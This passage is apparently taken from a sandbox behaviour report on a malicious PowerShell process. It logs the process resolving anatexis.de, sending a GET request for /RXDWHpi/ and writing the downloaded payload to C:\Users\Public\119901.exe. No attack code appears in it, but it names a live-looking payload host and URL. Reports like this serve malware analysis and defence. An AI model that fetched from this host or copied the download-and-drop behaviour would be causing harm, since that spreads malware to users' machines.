| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
Thread 0xb4c
12
6
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0xb64
132
278
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
24 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Environment | Get Environment String | name = public, result_out = C:\Users\Public |
|
2 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
5 | |
| File | Create | filename = C:\Users\Public\119901.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Public\119901.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = anatexis.de, address_out = 81.169.145.93 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 81.169.145.93, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 69, size_out = 69 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = anatexis.de, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /RXDWHpi/ |
|
1 | |
| Inet | Send HTTP Request | headers = host: anatexis.de, connection: Keep-Alive, url = anatexis.de/RXDWHpi/ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 1460 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 1460 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 6952, size_out = 6952 |
|
1 | |
| Inet | Read Response | size = 6952, size_out = 6952 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 8000 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 8000 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 7808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 8000 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 8000 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 8000 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 8000 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 8000 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 8000 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 307 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 307 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 7693, size_out = 2607 |
|
1 | |
| Inet | Read Response | size = 7693, size_out = 2607 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5086, size_out = 5086 |
|
1 | |
| Inet | Read Response | size = 5086, size_out = 5086 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 4374 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 4374 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4182 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 3626, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 3626, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2174, size_out = 2174 |
|
1 | |
| Inet | Read Response | size = 2174, size_out = 2174 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 2914 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 2914 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5086, size_out = 1460 |
|
1 | |
| Inet | Read Response | size = 5086, size_out = 1460 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 3626, size_out = 3626 |
|
1 | |
| Inet | Read Response | size = 3626, size_out = 3626 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 5834 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 5834 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 5172 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2166, size_out = 2166 |
|
1 | |
| Inet | Read Response | size = 2166, size_out = 2166 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 2206 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 2206 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 5794, size_out = 2920 |
|
1 | |
| Inet | Read Response | size = 5794, size_out = 2920 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2874, size_out = 2874 |
|
1 | |
| Inet | Read Response | size = 2874, size_out = 2874 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 8000 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 8000 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 5878 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 8000 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 8000 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 8000 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 8000 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 8000 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 8000 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 8000 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 8000 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 8000 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 8000, size_out = 8000 |
|
1 | |
| Inet | Read Response | size = 8000, size_out = 8000 |
|
1 | |
| File | Write | filename = C:\Users\Public\119901.exe, size = 8000 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
